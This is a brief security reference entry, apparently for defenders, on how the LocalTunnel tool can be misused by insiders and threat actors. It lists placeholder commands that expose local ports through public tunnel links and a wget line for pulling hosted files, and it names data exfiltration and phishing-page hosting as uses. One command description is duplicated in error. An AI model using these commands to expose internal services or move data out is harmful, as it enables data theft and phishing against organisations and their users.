LocalTunnels enables insiders as well as threat actors to expose local ports over the LocalTunnels generated links. The access is protected with a password. However, it can be accessed directly on the main page the first time tunnel is accessed. The important thing to note is that a service is required to be running onto the port which is required to be exposed. On the other hand, threat actors can set up their own listening server using LocalTunnels server provided on their GitHub page. This can be used by the insiders to exfiltrate the local data outside as well as threat actors to host phishing pages, malicious binaries etc.
This is a quick way to start the localtunnels by directly executing the localtunnels and generating links.
npx localtunnel --port <PORT>
This will bind the local port running on the server to the domain name and the port that is required to bind to the local port.
lt --host http|https://<URL>:<PORT> --PORT <LOCAL PORT>
This will install localtunnels globally on the system.
npm install -g localtunnel
This will install localtunnels globally on the system.
lt --port <PORT>
This will enable insiders as well as threat actors to download the hosted files onto the machine.
wget http|https://<URL>/<File/Directory>
The URLs generated can be binded to a locally hosting phising page by the threat actors.
lt --port <PORT>